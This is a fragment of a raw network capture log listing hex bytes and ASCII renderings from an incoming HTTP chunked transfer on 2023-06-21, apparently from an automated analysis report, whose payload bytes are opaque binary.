2023-06-21 02:28:15 UTC	544	IN	Data Raw: b6 e7 51 a0 24 25 Data Ascii: Q$%
2023-06-21 02:28:15 UTC	544	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	544	IN	Data Raw: 32 30 30 30 0d 0a 34 65 50 49 6d ab 78 de db da 52 5d 7d 16 57 8e c4 14 a9 b4 cf 89 6a f7 f6 4b da 00 e7 99 be 3a fe 04 cb 6c e9 79 07 00 3c 4b fb 72 4b c4 8e c1 7f 5f 0a 1b 99 3e f4 46 48 c1 30 f8 33 55 b0 54 83 10 2e 30 e5 93 39 c3 16 38 45 85 d1 2d d9 7c e6 3b 2c b3 a3 32 60 b1 a6 fc 39 d1 38 03 34 27 e5 76 4a b3 71 ba e5 d0 ee 28 34 5b 4d 93 b8 30 30 9f fc 0b f3 be be 18 95 1a e7 e4 fd 33 e6 52 3b f4 53 1d a5 b9 80 38 c2 3a 02 db b9 02 08 dd f3 78 a4 42 c0 72 8e 8c 71 4a b9 60 8c a7 7d 83 16 f5 f3 48 8d aa 4a f0 11 19 22 b5 ae 20 c6 99 df d5 20 89 ab 31 6d 0b 43 75 12 5b 98 d6 aa 17 85 83 8c 3f 26 d1 bb 3e 11 65 fd 31 05 a5 8a d7 61 b8 b5 77 d6 76 df 36 fe 16 5c bd 4c 6c 86 13 88 1b 35 ab 4a 81 98 ad 86 c6 dc f2 f4 e0 f5 64 f1 01 70 0c 03 7d b5 26 cb Data Ascii: 20004ePImxR]}WjK:ly<KrK_>FH03UT.098E-\|;,2`984'vJq(4[M003R;S8:xBrqJ`}HJ" 1mCu[?&>e1awv6\Ll5Jdp}&
2023-06-21 02:28:15 UTC	552	IN	Data Raw: 8a ec f6 86 6e a3 Data Ascii: n
2023-06-21 02:28:15 UTC	552	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	552	IN	Data Raw: 31 66 66 38 0d 0a 6c 5e 9c 68 b3 6e 82 5f 71 cf 51 ae df d0 49 cd 0a 0a ae 44 fd 05 da d9 1a 47 ca 87 d8 8c 7f 93 7e e4 64 b8 16 dc 98 c0 ed 31 77 86 7a cc 03 69 b1 ff 5f be 52 51 f7 89 6e 72 d4 6c be 8d 26 56 d6 0f f3 21 42 83 73 11 08 42 a1 dd f0 4e 3f 32 45 bf f8 77 75 3e dd 59 a4 10 6c 8d 18 86 70 45 7b f4 23 41 da 50 63 f0 8f 01 63 c4 72 6b b7 23 2f de 32 a1 85 83 11 c7 28 75 2b f0 e5 0a 3e 2e 54 49 62 41 ef 15 eb 00 45 a0 0b 28 e5 67 11 35 5f 65 73 3d 05 b1 37 5a 6b f3 6b 52 b5 17 83 cf ea 05 57 e4 1a 7e 62 6d b2 81 10 74 b9 10 87 4a 4e 3b e3 c2 d0 83 1b 7f 80 bb 7a 81 6d be cf 52 cf 88 34 49 fa c0 49 dd 11 18 ed 22 61 d8 98 08 d0 04 f7 00 9b 0f e9 e3 ca dc f1 e8 25 ea 96 88 95 d7 87 0d 39 29 a4 0c 55 10 5c 5e 1c d7 02 33 59 d3 c3 21 10 0b d4 63 fa Data Ascii: 1ff8l^hn_qQIDG~d1wzi_RQnrl&V!BsBN?2Ewu>YlpE{#APccrk#/2(u+>.TIbAE(g5_es=7ZkkRW~bmtJN;zmR4II"a%9)U\^3Y!c
2023-06-21 02:28:15 UTC	560	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:15 UTC	560	IN	Data Raw: b5 5d 8a bc 3e e7 5c 62 73 8e 51 8f 9c 44 f7 99 76 d5 bf 17 b1 41 8e e8 14 5b 82 70 6c 49 7f 0a 4a 2c 28 28 7d d9 84 34 a1 c9 6f 04 a6 0f df 2c 16 cd 64 e4 cd fe 5c f0 76 bd b2 3e be 70 c7 e4 c8 d4 8b 0e d5 3e ce 1f 01 bc e5 60 c4 3d 52 51 5c 5c d6 e0 c4 74 06 6b 55 3e aa 40 87 10 77 8c 4b c9 bb 53 71 78 6e 09 e5 e5 33 0b 9a 5e 86 aa 9f ab 81 d9 58 09 a6 e8 fd 67 f9 25 12 47 b1 e0 b9 75 c7 d4 bb a9 c7 02 d8 cb 89 65 14 3c 50 38 eb 77 2f 16 81 c3 47 ed 54 38 97 d9 01 7f 0c 0b d0 51 d3 65 3b 96 14 84 fa 4a 02 8d 71 c2 db 17 a2 e8 29 aa b2 88 e6 8a 34 91 ae 04 18 c2 7a ef bb e2 b6 bc eb 0a 45 81 0f fe 29 f5 15 14 b2 21 44 f0 d8 3a 5f bc 6a 7a e1 58 0f 1a 07 eb c8 f1 ae 1f 43 46 2f fa 73 2c c6 4c aa c9 9f a0 71 25 03 64 79 19 97 7d 29 94 dc d7 47 78 94 63 cc Data Ascii: ]>\bsQDvA[plIJ,((}4o,d\v>p>`=RQ\\tkU>@wKSqxn3^Xg%Gue<P8w/GT8Qe;Jq)4zE)!D:_jzXCF/s,Lq%dy})Gxc
2023-06-21 02:28:15 UTC	568	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	568	IN	Data Raw: 32 30 30 30 0d 0a 5d 9e 79 b5 79 fb 32 86 a8 ec cc ca 0e 3d 47 a0 ae 7c f2 dc eb 74 91 0a 98 3d 38 ea 98 48 f8 51 a1 a3 7b 44 43 c0 c1 1b cd 5b 2a e0 8a 7d 06 c1 d3 89 6a 6d 77 1b c6 3f dd 7f 95 00 a4 77 24 47 7c 48 19 0f a3 d7 13 18 e0 bc 53 a5 bd 98 cf 3d 34 df 14 94 50 81 95 a2 68 1d 03 a7 da 30 ea 51 a0 93 ee a5 29 3f bb 47 54 78 bb 57 3a b0 bb 31 28 b7 74 2b 74 09 16 d0 37 ee 96 6b 0d 64 61 8e 3a f7 29 35 f3 ac ac 33 e0 7a ab c6 6f 8c a8 0c ca 32 f9 bb da a6 e4 80 99 60 e5 b4 4c af f7 f1 3b 03 ea f8 cd 17 42 f0 d4 c7 f2 45 75 f1 33 b7 8a b7 90 3e 97 34 01 7a f3 3e 5d d6 87 63 76 18 15 a2 a0 0a 5a e4 6d f8 cf 79 6d ad 24 30 8d a5 2f 6d 76 1f 36 2b 7d cc 6f 4f 36 1e 08 a9 e9 40 8e 96 07 b0 8b 6a 09 3e 37 96 0f 79 93 3c 1c bd cf 27 81 5d d0 8d f5 f3 bc Data Ascii: 2000]yy2=G\|t=8HQ{DC[*}jmw?w$G\|HS=4Ph0Q)?GTxW:1(t+t7kda:)53zo2`L;BEu3>4z>]cvZmym$0/mv6+}oO6@j>7y<']
2023-06-21 02:28:15 UTC	576	IN	Data Raw: 85 c4 cc 31 e2 5c Data Ascii: 1\
2023-06-21 02:28:15 UTC	576	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	576	IN	Data Raw: 32 30 30 30 0d 0a 9f 12 1b 7b 01 16 67 5f 28 7e 79 d5 19 6f 4f 37 d6 ba 59 eb ee 61 ed 7c d5 5d 04 e3 48 7f 86 f4 ca db 5f 74 d9 53 ea 9f a9 83 6e 5c c6 8e 72 2e af e6 47 ff 75 dc f2 78 d2 0a 75 d1 fe c0 eb e0 2f ec 05 a6 84 6f e5 31 f3 b1 89 de 9f b1 45 4c b7 73 0e 57 19 0a 95 97 a6 ce a1 cb 57 8f fa 51 7f f7 78 0e a7 15 78 3b 1a 46 40 7a 59 af d5 35 6a dc 15 55 35 cd 56 1d b4 ae 5a 20 9c a4 b6 cf 42 23 a6 4e ac 00 5c 47 3b 84 a1 58 d9 69 88 a6 b8 cf 2c 5b a9 50 e5 70 96 27 02 2b a9 47 7e e8 7c a3 06 08 c0 88 3f f6 87 8c bc 70 b1 d6 3b 5f 1c 28 0f 57 23 cf c0 1a aa 5f bd a3 3e 33 c2 c4 7a 14 93 1a 1f 5e e5 e6 98 eb f8 96 52 76 82 ea cd 5c 04 15 ca 08 69 0c 73 fa 0e 68 0c 36 e2 4a c2 b6 c2 92 32 ec 79 36 ce f0 00 b7 36 34 f4 f4 98 31 13 c6 05 4f ef 91 77 Data Ascii: 2000{g_(~yoO7Ya\|]H_tSn\r.Guxu/o1ELsWWQxx;F@zY5jU5VZ B#N\G;Xi,[Pp'+G~\|?p;_(W#_>3z^Rv\ish6J2y6641Ow
2023-06-21 02:28:15 UTC	584	IN	Data Raw: 60 1d c7 d0 e0 67 Data Ascii: `g
2023-06-21 02:28:15 UTC	584	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	584	IN	Data Raw: 32 30 30 30 0d 0a 07 4e 1a 01 b9 42 a9 48 1c 74 d9 91 b2 19 27 ea ca d4 e2 f1 04 4a e1 68 68 96 7a 46 db 1b f5 58 6a 35 b7 a1 29 59 77 ad 14 b7 fc dc 8f fe 85 42 94 6c 19 40 7d 03 93 62 e3 48 94 fd ae 09 da db d9 a8 77 41 76 c4 d7 76 67 56 02 75 64 63 f1 eb 0b a2 38 62 e4 8c ec 8b c4 2f 47 fe 84 f8 2a 42 ba 01 a6 3c 62 53 a6 ae 52 f8 97 0f ed ed 93 37 76 a1 c5 16 74 78 34 9c 1d e9 5f b2 58 b0 41 b1 4a d7 cc 90 f4 69 d4 a4 71 4c f5 9e 13 19 58 e9 56 77 c9 40 90 c1 d9 41 51 24 d0 d3 15 67 93 55 c5 2b 55 0f 8b 97 13 70 b3 8b a0 67 a4 c7 cd 3f a3 53 a3 40 0f 00 89 c9 05 ef 20 c4 b5 73 17 8e 3f b4 5a ae 37 55 a8 41 1e 9c a0 e3 ea b7 8b a6 a6 0a 68 72 17 12 d6 39 3f d1 b3 dd 33 8c 9d 4e 21 b3 18 66 d1 e7 1a 17 b9 3c 6d af ad c4 e3 b8 21 cf a2 56 a7 64 47 ca 71 Data Ascii: 2000NBHt'JhhzFXj5)YwBl@}bHwAvvgVudc8b/G*B<bSR7vtx4_XAJiqLXVw@AQ$gU+Upg?S@ s?Z7UAhr9?3N!f<m!VdGq
2023-06-21 02:28:15 UTC	592	IN	Data Raw: 9e 9b 75 b9 1f 83 Data Ascii: u
2023-06-21 02:28:15 UTC	592	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	592	IN	Data Raw: 32 30 30 30 0d 0a 06 3c e7 4b 28 ae 5f 6e 62 06 77 8a 0e ee de b0 cd 74 f6 bf 5b 28 16 3b 52 3b 87 84 03 f5 89 7e b2 9d 0c ac 74 31 9b 58 4f ca 55 2d 8f a9 a6 26 dc 0c 19 d1 c3 58 c7 27 11 91 ee a1 b2 f9 55 08 ed ac ba 2c 66 5d fe d3 b4 29 b0 44 ae 28 19 d3 16 7c 2a 58 92 3c 7e 08 9e 7e 10 7a 9d fa 82 29 fc d7 cd bb 16 be df e9 b2 de 6d bb 29 e5 46 32 85 a8 f4 72 bc 6e cc ff 87 0a 45 8e e8 dc 6a 90 e7 ae c4 2e e6 13 dd 7f 6f 56 90 1c 2f a7 b6 67 75 54 d2 a8 96 27 c9 9b 88 eb 43 27 bb a9 66 0e d5 61 0d d2 66 b7 5b 3d 47 13 77 cd 1c 1d 15 46 ff 75 81 99 96 51 6f df 5d c5 71 2d b2 a5 bb 27 57 7e 5d 5a 05 80 2e c5 2d 68 d3 86 bd c0 67 77 18 58 9c 04 22 72 23 6d 20 ed 70 46 f8 47 b2 08 ac d6 4e 3e dc 98 a9 9b e2 25 1a 59 9c 91 45 b8 3d 8d 3f 89 bf fb 97 3b ae Data Ascii: 2000<K(_nbwt[(;R;~t1XOU-&X'U,f])D(\|*X<~~z)m)F2rnEj.oV/guT'C'faf[=GwFuQo]q-'W~]Z.-hgwX"r#m pFGN>%YE=?;
2023-06-21 02:28:15 UTC	600	IN	Data Raw: b3 b2 df 0a 11 6b Data Ascii: k
2023-06-21 02:28:15 UTC	600	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	600	IN	Data Raw: 32 30 30 30 0d 0a 46 65 7d b1 49 74 9a 4e 40 f0 ce 27 f6 54 91 b6 5b 47 86 d6 03 88 3a 88 14 c1 b5 70 1c 59 fe cf 69 01 1c 4e c7 2e ac c2 7d 1b 84 fe 23 e9 28 8c 5a 04 02 04 7c cb bb c2 2d 91 8d 45 ee 4a 08 bc cc 8c 96 3f 4e 7e 6a 14 5a 5e 73 6c 40 9f 64 4d c3 2f de 9d 9a 99 d1 62 ea 73 5a e8 2f 64 ad 66 4f ed 9d 2e f6 0d d4 6e a2 85 69 77 90 69 75 9d 8d 9c e3 ae 65 74 61 06 e0 57 1b 6c 56 6a 4a 0b ed 79 48 8b d8 92 5f 13 8c 21 69 82 ea dd 87 a3 2c 8a 07 81 18 e6 6b e0 66 e4 d6 de 0c c7 f1 9f 56 e8 36 e6 3e 51 50 38 67 4f f4 40 48 93 1c 12 8a b8 78 24 5e 53 67 cb 2b 2f ab e1 ad 5c 79 b8 94 76 6e 1c c6 c2 a2 99 21 d1 2b a8 31 74 51 8e 8b 2e 59 4a 8e 11 18 5b aa 15 9d b5 02 fb bf 05 ef 83 e2 73 0a 5b cc 2e 9b 39 61 4d bd 39 6b 8b 14 a7 e5 9e ed ab 68 ee 48 Data Ascii: 2000Fe}ItN@'T[G:pYiN.}#(Z\|-EJ?N~jZ^sl@dM/bsZ/dfO.niwiuetaWlVjJyH_!i,kfV6>QP8gO@Hx$^Sg+/\yvn!+1tQ.YJ[s[.9aM9khH
2023-06-21 02:28:15 UTC	608	IN	Data Raw: 76 8a d4 20 c2 63 Data Ascii: v c
2023-06-21 02:28:15 UTC	608	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	608	IN	Data Raw: 32 30 30 30 0d 0a 2b f7 77 fa fc 48 26 db e1 23 19 22 34 ed 39 1f db d4 58 7d 33 f7 e5 2a 16 47 79 28 c9 7a 2e 68 ec 0b 70 37 cd 6d 1d 1f 5e 02 60 93 76 5c 2b 42 5d 7b 35 ba bf 16 c7 a2 7c 45 58 c7 77 88 0c 0c 65 7a 37 e5 b9 7e 05 33 0a 9b 17 a1 7b 7b 8d a4 c4 c0 e8 cc 80 3f 1f 70 77 0c 02 bd 18 e3 82 00 d3 15 08 10 93 aa 1c fd 96 bc 2a 99 45 82 4e 08 7c 58 70 a2 9b 7f 18 29 59 36 a0 96 bc f1 d5 97 e9 3a d9 26 58 65 a5 17 95 01 e3 92 72 0b 55 67 f3 f5 6a da 47 6b ff e4 2e e5 20 40 f4 27 cf 78 88 2d cf eb 1d e6 e1 41 2c ec 91 49 7d 14 2f b6 5c a7 6b 93 8e 73 4d ef 81 3f 45 16 75 67 f0 3b 92 db 30 0b df e0 86 03 c0 a6 39 91 cd af 80 43 11 3b 96 84 81 99 8d 8e 63 96 a8 0d bb 55 9a 40 49 c9 c3 8c 9b ec 63 a3 10 59 32 86 73 18 2b 51 10 54 e3 20 f0 b5 62 7f d2 Data Ascii: 2000+wH&#"49X}3Gy(z.hp7m^`v\+B]{5\|EXwez7~3{{?pwEN\|Xp)Y6:&XerUgjGk. @'x-A,I}/\ksM?Eug;09C;cU@IcY2s+QT b
2023-06-21 02:28:15 UTC	616	IN	Data Raw: 4a 91 8a b4 11 d5 Data Ascii: J
2023-06-21 02:28:15 UTC	616	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	616	IN	Data Raw: 31 66 66 38 0d 0a a4 89 57 c1 68 ba 31 33 14 82 bc 69 16 0b aa 6b 93 05 71 88 9a 48 fa 58 25 aa c7 c5 3e b7 09 6a 1f 30 26 3e 8d 67 73 e1 5b 03 5f 12 d6 c3 9d 2d 19 2f e0 98 75 04 59 fd 53 b0 96 e2 d8 c0 36 7b 80 be c4 2d ca a1 c3 ae 43 4e 87 87 88 25 d5 f3 ac cd 44 78 54 e9 43 7c 15 02 25 6e e7 45 5d 58 54 bf 60 b8 ba 29 14 b9 db 68 c5 5e 4d 00 7a 57 89 4f 5a ef f2 0c 29 ba c5 67 5f c2 7b 62 ca 07 49 e5 dc 39 8b 86 0f 01 2d 28 e1 3e e3 e3 50 5d a0 3d 7f ab 19 19 7b 74 76 36 d3 ca c7 f7 36 94 46 58 29 69 e0 91 6c e1 de 48 35 79 49 e3 11 3f 6a ec e6 d8 7a 83 ac 0c 2a 4a 11 50 d1 e2 bf c8 79 d4 5d ad a7 80 1d 7a d9 2e 15 a6 18 b8 1b 4b 1c 53 33 01 e4 39 ae f4 8f 57 36 cd 33 50 5e 3c b7 43 77 57 95 57 47 14 be 96 ef 02 5e d1 33 4e 06 9a bb 3f ad f0 61 c1 4b Data Ascii: 1ff8Wh13ikqHX%>j0&>gs[_-/uYS6{-CN%DxTC\|%nE]XT`)h^MzWOZ)g_{bI9-(>P]={tv66FX)ilH5yI?jz*JPy]z.KS39W63P^<CwWWG^3N?aK
2023-06-21 02:28:15 UTC	624	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:15 UTC	624	IN	Data Raw: cf 98 b8 de ad da b0 a2 9d 50 d3 3e f2 c9 05 be e9 87 27 08 9f 72 ae a5 12 30 ec 9f 83 75 b3 eb 52 67 4c b6 e0 7d 65 f6 9c e3 a3 b7 26 a8 d7 0e 1f 20 35 1f 30 92 d8 eb a3 9c 62 c2 83 0b 3a d0 b5 7e af 68 92 d4 e9 fb 87 18 2f 4e 00 b3 6c 75 29 67 cb a3 5c 7f 4a 1a b7 d1 e6 10 fa 1c 81 10 1a d2 ef 21 02 c1 4d 40 85 e1 57 55 48 f8 aa 74 65 4b e3 c9 c8 64 85 64 1c e2 53 80 05 cb 32 9d c7 ea d2 40 04 1b 24 2d 10 6a 8d 05 78 fb f7 10 49 17 f1 79 34 87 9e f6 14 8d d2 5e 63 84 4b f8 3d 9f 5c 80 3a 9e 3f 14 ed 22 36 1d 1a 8d 3f aa 12 b6 a5 5d 48 9b 24 bb b8 e3 a4 41 4f 40 67 43 5f fb 81 89 02 85 d3 e6 34 99 fa 51 bf 27 d4 62 a7 9e 4a c4 8c b7 28 8e 56 70 ff bd f3 61 4f 6d 5e fd f3 0b 7e ad 31 b7 aa da 58 19 8d 0a e6 e5 6a ba ef 5c 1d 83 51 5d 20 d1 88 74 de 4f 22 Data Ascii: P>'r0uRgL}e& 50b:~h/Nlu)g\J!M@WUHteKddS2@$-jxIy4^cK=\:?"6?]H$AO@gC_4Q'bJ(VpaOm^~1Xj\Q] tO"
2023-06-21 02:28:15 UTC	632	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	632	IN	Data Raw: 32 30 30 30 0d 0a 2a ae 72 20 91 a7 f7 b5 f0 fa 7c f2 ca c5 e5 ab 9d 46 a4 22 2c 9d 29 75 5b 4b eb cf c5 f6 c2 8e 38 75 8d ac 00 e0 d9 8d 4b 76 d8 6b bf c5 48 6b 6b 85 ff ad ad e3 57 d8 8a 5b 17 59 d8 d5 21 b2 59 95 0f e8 aa c5 36 6a 99 97 22 5a 79 46 40 50 d4 af 12 55 bc ec 8b bc b4 af d7 81 0f 43 81 11 3b f6 e6 f8 99 e7 56 c8 35 56 d8 55 c4 78 b8 bd 4c 23 a9 56 ce bb d0 71 3f 8f 37 81 21 95 68 78 a1 f4 15 6f 9b 20 6a c5 c4 79 4e 7c de 70 f5 fe 0d d9 0d f5 ca 3c de 72 2c b9 8d b0 2d 2b 83 0e 53 87 19 43 92 32 92 f6 2d 88 04 fa 33 f6 b7 2f 6a 12 b0 6a c2 94 63 1e f4 b3 f9 b6 d9 f6 02 d4 9b 1b 15 85 7e ef 6c 0b fc 6b 95 8d 82 b5 fd fd 59 e6 e0 9e 02 fd 8b 15 17 66 6e 64 d9 03 45 a8 d6 03 5d d1 96 88 35 6d 08 75 1f c2 9d 23 3c df 1f 06 41 c0 37 4e c6 1f 59 Data Ascii: 2000*r \|F",)u[K8uKvkHkkW[Y!Y6j"ZyF@PUC;V5VUxL#Vq?7!hxo jyN\|p<r,-+SC2-3/jjc~lkYfndE]5mu#<A7NY
2023-06-21 02:28:15 UTC	640	IN	Data Raw: 2e 02 b7 81 95 f9 Data Ascii: .
2023-06-21 02:28:15 UTC	640	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	640	IN	Data Raw: 32 30 30 30 0d 0a f8 c6 df 26 5b f1 96 88 7d ca f6 8d e0 22 ba 28 bd cb 45 5a 42 6e 72 74 d7 aa 84 5b 73 07 f4 45 41 3d 89 ad 64 12 1b 0c 02 02 77 f1 2b 9f 27 ca 00 d9 ea 7e bd f8 78 28 f9 ad a8 ef be 73 b7 40 95 c9 5b 37 5f d3 f7 1b fb 04 85 7b 15 6e 38 2a 55 b2 62 51 54 71 69 81 90 03 e3 6e e2 e2 f1 ba 4c a5 96 42 09 04 ee 22 ad 97 d8 82 52 c7 78 8e 54 8d 49 f3 c7 d3 a8 d5 ac 12 7d d7 6b 2a 1a 6c 51 72 4e e6 4b 20 19 e6 01 72 2a 49 fe c8 ee 9a 82 57 bd 26 90 ce d0 0e b1 4f 88 70 10 06 c7 f1 03 3e e9 a7 71 45 01 15 e8 a4 db ce ad 3f 51 ba 81 a0 0f 0a 04 e0 22 3d 0d ba 98 21 5d 1c 86 80 91 b4 a6 05 bf 8e 2c 55 e2 4c 4a 36 18 2e d1 51 b4 35 40 4d bb 31 94 12 8b c9 6d 69 ed 41 85 8c 2e 89 63 a6 24 64 c2 57 8f 01 cd 06 e2 c2 3e 82 0b 24 49 d4 09 76 7a 70 46 Data Ascii: 2000&[}"(EZBnrt[sEA=dw+'~x(s@[7_{n8UbQTqinLB"RxTI}klQrNK r*IW&Op>qE?Q"=!],ULJ6.Q5@M1miA.c$dW>$IvzpF
2023-06-21 02:28:15 UTC	648	IN	Data Raw: 94 35 6c 30 37 3e Data Ascii: 5l07>
2023-06-21 02:28:15 UTC	648	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	648	IN	Data Raw: 32 30 30 30 0d 0a f3 a1 99 ab 0e 81 0d e5 75 eb 5d ce 5d a5 01 ca 88 e8 be 6f 76 2b 1e b0 a1 6f e9 df 53 a6 79 0c db 4e 0c 8f bd dc 4a 45 27 2b 87 b9 c6 b1 3a 7c 83 48 5a 5e 02 d2 f6 05 58 b3 4d 83 f2 55 9e ad 33 2a f6 47 18 18 4b 65 ac c6 c9 5a 27 b6 95 4d f0 91 cb 04 f0 e8 f6 85 e5 4c 63 8b 3c 87 df 33 0b d9 b3 06 93 b9 60 57 6e 4f 25 76 db ba 7b 0b 84 f9 00 82 73 b6 c3 c3 34 96 83 c0 ae af ee 39 e7 3d f7 87 60 7e 44 4a d9 49 0b a8 26 3a 0a e9 fc b4 b9 97 3a 2a 85 4c 4f 18 f7 77 00 4d fe f5 1f ec a1 e2 16 84 72 9a 36 e8 9f 63 9a 32 a2 dd 36 41 48 6c 5a 14 0c 5d 21 2b 60 bb 02 71 78 58 f2 91 12 64 14 21 37 97 3b 04 08 d0 00 45 d9 b8 a7 39 5d f0 e7 de 67 4b c4 30 1d b3 31 3c 8d 51 e7 79 65 01 a5 5f fb cf 19 75 72 f9 58 92 c8 ea 58 45 ae a8 f2 3c 03 c8 ca Data Ascii: 2000u]]ov+oSyNJE'+:\|HZ^XMU3GKeZ'MLc<3`WnO%v{s49=`~DJI&::LOwMr6c26AHlZ]!+`qxXd!7;E9]gK01<Qye_urXXE<
2023-06-21 02:28:15 UTC	656	IN	Data Raw: c5 0a 20 3e b4 1f Data Ascii: >
2023-06-21 02:28:15 UTC	656	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	656	IN	Data Raw: 32 30 30 30 0d 0a 36 52 b7 24 48 04 c7 e5 25 4a f8 1e 1a 14 8e 67 50 ad 5f 2a 20 07 3f 31 75 98 35 f7 92 76 f1 0a c7 64 61 b2 2c 2e cc 2c a3 a9 c4 3d 41 30 e7 b8 ba f7 6e 5a d4 a3 4b 04 3f 04 0b 78 85 91 64 c5 db 55 39 69 66 df 4e 49 aa f2 5f 0a 8a a8 3d 20 0d 97 6b 51 2d dc 9d 6c c3 fa 82 84 f3 4e 61 6d fe de 65 d4 0e 2f b2 60 aa 57 bc 8d 90 b5 e7 b6 f4 f2 7d 59 7f e4 3d 02 af 8f 47 82 24 f2 be 59 51 e2 97 38 7c ca 26 30 25 32 78 84 b9 22 b8 52 8b 49 0f 80 e6 73 c7 45 70 ae 8a cd e7 8e ff fc 19 69 f0 a9 d3 60 37 fe 5a c8 10 d1 c0 e5 be f4 47 7d 8e fb fd 66 04 69 7e 76 31 83 35 8c 15 d8 a7 97 ed e7 cc 62 b0 1c 58 0a 3e a1 74 ad 2b 60 65 29 9b c7 11 a3 2f db 85 1e 71 23 05 db 98 34 56 bf 26 81 93 7d 4f 28 b9 99 61 09 33 ef 1d 10 20 82 e2 96 4e bf f7 a9 4f Data Ascii: 20006R$H%JgP_* ?1u5vda,.,=A0nZK?xdU9ifNI_= kQ-lName/`W}Y=G$YQ8\|&0%2x"RIsEpi`7ZG}fi~v15bX>t+`e)/q#4V&}O(a3 NO
2023-06-21 02:28:15 UTC	664	IN	Data Raw: 99 6b 90 18 bf 30 Data Ascii: k0
2023-06-21 02:28:15 UTC	665	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	665	IN	Data Raw: 32 30 30 30 0d 0a 7b 60 14 e1 5a 34 03 04 33 df bb 79 a6 c9 15 36 1c 58 94 95 84 48 a6 3e 9d 43 df 75 b1 b1 d8 7d 20 9a e1 e2 0c 69 06 7e 8d bf a1 cf 51 01 dc 63 b9 bd 28 06 cb 2e 76 68 3a e4 2a d7 f0 88 67 c3 54 eb 69 c2 35 1a 85 d4 ba 7a 73 b8 5a 60 42 4a 79 a1 c4 73 d5 40 59 e8 0c ba 40 4d 49 7f 4d 99 08 44 7c 77 5b 92 d8 b1 9d 5c 56 fe a2 11 6b a6 56 19 88 1b 2b 77 65 be 9b d3 d4 37 9a 64 50 f6 70 b1 b5 54 16 b5 2d 0e 6a 15 c1 9d 4c 57 74 c2 6c 56 da ca 67 9f 6f 5c 6f c0 5f ac c2 08 e4 a6 91 6f b0 8b 3f 1a 63 d7 a4 42 9f b6 d9 03 28 1e 0e 6c 59 3f 4d 2d c5 d4 dd 43 28 e8 66 3e b0 fa d2 ad 16 dc 78 e8 f7 c9 ab 62 5b 02 20 f2 b9 2a e2 3a 91 01 f7 cb f2 57 81 71 7e 73 3e 95 43 2b e7 29 ec 45 b2 d5 71 18 08 bc 27 4d 61 c6 44 4a 41 f8 1b 71 d2 34 f9 cc 1d Data Ascii: 2000{`Z43y6XH>Cu} i~Qc(.vh:gTi5zsZ`BJys@Y@MIMD\|w[\VkV+we7dPpT-jLWtlVgo\o_o?cB(lY?M-C(f>xb[ :Wq~s>C+)Eq'MaDJAq4
2023-06-21 02:28:15 UTC	673	IN	Data Raw: 73 0a a3 53 a6 78 Data Ascii: sSx
2023-06-21 02:28:15 UTC	673	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	673	IN	Data Raw: 32 30 30 30 0d 0a 18 67 f9 6c 4a 4d 1c ec 71 98 cc 93 63 6a cd c9 07 21 a7 7b 55 3c b2 b0 76 d0 50 68 40 b8 63 2e 36 44 e3 3d 73 9a 30 ce 46 95 90 af 87 02 34 02 d1 66 dc b0 a7 12 27 c1 11 e9 d6 f9 88 f2 bd 41 bd 6a 4d 5a 32 c1 96 78 15 d9 b9 58 8e 15 5b 85 3e c9 ed a5 f5 f8 8f 06 65 00 39 b0 26 69 34 39 c1 c7 1e 6c 81 92 58 be 9f 0c 39 56 fb b5 07 7a 8b 54 33 23 e4 72 78 2b fc e5 62 63 77 5d db 3d 08 31 16 1e 2d f6 20 a6 f4 34 aa cb 85 5f 04 f1 d9 99 4f 28 f1 ff 1e 3a f0 b7 fe 01 10 75 2a c7 d2 d5 c6 fe 10 b3 36 4d 37 c1 2c 76 40 54 e0 8d 7a 79 21 15 cd 0e c6 15 8a 6d 24 2e 85 93 cf b6 92 81 22 b3 32 ff 4d a7 a5 ef 9f ae 2a 9a 8b ea c7 ea bd 50 c2 5d bd d7 07 97 44 e6 ed 70 cb e2 02 29 a3 ed 31 2e d0 57 a7 e5 8d fc 15 82 6f 4c 5b 49 74 da 4a 30 44 32 25 Data Ascii: 2000glJMqcj!{U<vPh@c.6D=s0F4f'AjMZ2xX[>e9&i49lX9VzT3#rx+bcw]=1- 4_O(:u6M7,v@Tzy!m$."2MP]Dp)1.WoL[ItJ0D2%
2023-06-21 02:28:15 UTC	681	IN	Data Raw: c4 a7 f3 f5 df 61 Data Ascii: a
2023-06-21 02:28:15 UTC	681	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	681	IN	Data Raw: 31 66 66 38 0d 0a b2 97 e0 a4 43 64 7e 2b 26 af 1b 32 46 0d 9f 7e f8 65 32 16 73 5a e3 f4 ab f7 ed 20 bf 76 72 bb 08 fd 5e 32 01 b1 0c 9e c7 66 15 41 ad a3 8d 4c 90 a3 c6 8e a1 23 cf 69 1b 87 e3 25 f2 73 eb 2f 60 a2 ca a1 6c 25 0d 16 37 0b 2e 25 f7 6d 3a b5 7b 90 6d 38 bc 3d 4b 96 c7 a0 52 05 92 34 82 60 24 1c d9 aa d8 de 9d 2f 1a 9b 10 82 3f d0 8d 3d 8e 83 2f ae 38 c7 18 de c1 85 6c 48 31 6a 0f 48 07 c5 98 56 15 81 5f 46 7a 51 0d 31 02 15 b2 ac 28 46 f1 cf c0 c5 e5 67 bc d4 7c f8 2f 54 73 90 7e 59 14 4a 77 62 ca 7e 42 d1 2a 03 e2 83 29 e7 81 5f 2e 32 f5 03 64 b9 1e 97 3a 2d 3b 18 37 be a4 48 af ca d4 0d 55 66 64 0b 9c eb fa ca b5 3e d5 da 